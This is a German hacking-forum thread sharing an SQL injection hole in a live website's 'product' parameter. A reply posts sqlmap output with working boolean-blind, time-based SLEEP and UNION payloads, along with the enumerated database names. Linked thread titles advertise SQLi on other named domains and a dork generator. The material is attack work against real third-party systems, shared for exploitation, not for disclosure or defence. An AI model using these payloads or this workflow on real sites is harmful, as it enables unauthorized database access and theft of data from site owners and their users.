Vielleicht kann ja jemand was damit anfangen. Viel Spaß!
Vuln Url:
Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.
die scheint gefixt zu sein.
Nein ist nicht gefixt.
--- Parameter: product (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: product=1 AND 4399=4399 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: product=1 AND (SELECT * FROM (SELECT(SLEEP(5)))EWvB) Type: UNION query Title: Generic UNION query (NULL) - 64 columns Payload: product=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171767171,0x62666367525a4c6f44664a6f507248644447494555545843486a416e6861546d667777666d55415a,0x717a706271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- lYqA --- [19:30:53] [INFO] testing MySQL [19:30:54] [INFO] confirming MySQL [19:30:54] [INFO] the back-end DBMS is MySQL web application technology: Apache back-end DBMS: MySQL >= 5.0.0 [19:30:54] [INFO] fetching database names available databases [2]: [*] information_schema [*] usr_p205932_1 [19:30:54] [INFO] fetching tables for databases: 'information_schema, usr_p205932_1' ---
Staatliche Willkür. Ihr Service vor Ort.
Bundespolizei - bpol@exploit.im
Thanked by 1 Member:
|
|
Thema | Forum | Themenstarter | Statistik | Letzter Beitrag | |
---|---|---|---|---|---|
[Sqli] neuewienerwerkstaette-wien.at |
Classic Hacking | CyberFlash |
|
|
|
[SQLi] wokotu.de |
Classic Hacking | CyberFlash |
|
|
|
Changwang's SQLi Dork Generator |
Zubehör | Exynos |
|
|